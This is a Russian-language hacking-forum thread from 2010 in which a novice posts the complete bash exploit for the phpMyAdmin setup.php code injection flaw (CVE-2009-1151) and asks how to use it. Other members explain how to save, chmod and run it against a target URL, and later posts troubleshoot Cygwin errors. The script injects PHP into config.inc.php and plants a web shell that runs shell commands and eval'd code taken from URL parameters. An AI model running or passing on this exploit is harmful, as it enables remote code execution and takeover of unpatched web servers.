HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.12.2010, 02:45
Muziq
Новичок
Регистрация: 02.10.2009
Сообщений: 1
Провел на форуме:
16226

Репутация: 0
По умолчанию

Как использовать эту иньекцию? Есть уязвимая phpmyadmin но я даже не представляю что делать с этим кодом. Сохранить в Php? На хостинге не запускалось...

phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit

Код:
Code:
#!/bin/bash

# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln, 
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)

# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

if [[ $# -ne 1 ]]
then
	echo "usage: ./$(basename $0) "
	echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
	exit
fi

if ! which curl >/dev/null
then
	echo "sorry but you need curl for this script to work!"
       	echo "on Debian/Ubuntu: sudo apt-get install curl"
       	exit
fi

function exploit {

postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

	flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"
	
	echo "[+] attempting to inject phpinfo() ..."
	curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null

	if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
	then
		curl -ks --url "$3/config/config.inc.php" >$flag	
		echo "[+] success! phpinfo() injected successfully! output saved on $flag"
		curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null
		echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
		echo "    $3/config/config.inc.php?c=ls+-l+/"
		echo "    $3/config/config.inc.php?p=phpinfo();"
		echo "    please send any feedback/improvements for this script to"\
		"unknown.pentestergmail.com"
	else
		echo "[+] no luck injecting to $3/config/config.inc.php :("
		exit
	fi
}
# end of exploit function

cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided ..."

#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
	length=`echo -n $token | wc -c`

	# valid form token obtained?
	if [[ $length -eq 32 ]]
	then
		echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
		# attempt exploit!
		exploit $token $cookiejar $1
	else
		echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
		exit
	fi
else
	echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
	exit
fi

# milw0rm.com [2009-06-09]
 
Ответить с цитированием

  #2  
Старый 05.12.2010, 16:39
Mr.Crazy
Guest
Сообщений: n/a
Провел на форуме:
3805

Репутация: 0
По умолчанию

Perl, это perl, *.pl расширение.
 
Ответить с цитированием

  #3  
Старый 06.12.2010, 01:33
CyberRat
Guest
Сообщений: n/a
Провел на форуме:
2741

Репутация: 0
По умолчанию

Цитата:
Сообщение от Mr.Crazy  
Mr.Crazy said:
Perl
, это
perl
, *.pl расширение.
ну и советчик бл*, это перл #!/bin/bash ?

сохраняешь как pma.sh ставиш права chmod +x pma.sh и запускаешь ./pma.sh http://target.tld/phpMyAdmin/
 
Ответить с цитированием

  #4  
Старый 07.12.2010, 03:01
Muziq
Новичок
Регистрация: 02.10.2009
Сообщений: 1
Провел на форуме:
16226

Репутация: 0
По умолчанию

Цитата:
Сообщение от CyberRat  
CyberRat said:
ну и советчик бля, это перл #!/bin/bash ?
сохраняешь как pma.sh ставиш права chmod +x pma.sh и запускаешь ./pma.sh http://target.tld/phpMyAdmin/
А в чем может быть проблема? СТоит Cygwin Но не реагирует на команды допустим вводим ls -al стандартная команда пишет "command not found" ввожу команду для файла пишет " no such file or directory".

В чем проблема? И какая домашняя директория?

Где можно почитать о настройке данной программы? Или проще unix систему ставить?
 
Ответить с цитированием

  #5  
Старый 07.12.2010, 23:45
CyberRat
Guest
Сообщений: n/a
Провел на форуме:
2741

Репутация: 0
По умолчанию

да поставь убунту второй системой и будет тебе счастье
 
Ответить с цитированием

  #6  
Старый 09.12.2010, 02:36
Muziq
Новичок
Регистрация: 02.10.2009
Сообщений: 1
Провел на форуме:
16226

Репутация: 0
По умолчанию

Как вообще можно это использовать?

http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/

И что вообще должно в итоге то получится?

При запуске выдает ошибки синтаксиса

И вообще что должно получится в результате действия данного скрипта?
 
Ответить с цитированием

  #7  
Старый 09.12.2010, 02:46
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

выполнение произвольного php кода.

но нужны права на запуск /scripts/setup.php
 
Ответить с цитированием

  #8  
Старый 14.12.2010, 17:17
str71
Guest
Сообщений: n/a
Провел на форуме:
1985

Репутация: 0
По умолчанию

Столкнулся с такой же проблемой, не могу запустить этот сплойт. Пробовал через cygwin с расширением .sh выдает ошибки:

Код:
Code:
Administrator@f3p9lpo69i ~
$ ./p.sh
./p.sh: line 2: $'\r': command not found
./p.sh: line 7: $'\r': command not found
./p.sh: line 11: $'\r': command not found
./p.sh: line 22: $'\r': command not found
./p.sh: line 26: $'\r': command not found
./p.sh: line 27: syntax error in conditional expression
'/p.sh: line 27: syntax error near `]]
'/p.sh: line 27: `if [[ $# -ne 1 ]]
Кто нибудь чем нибудь может помочь?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ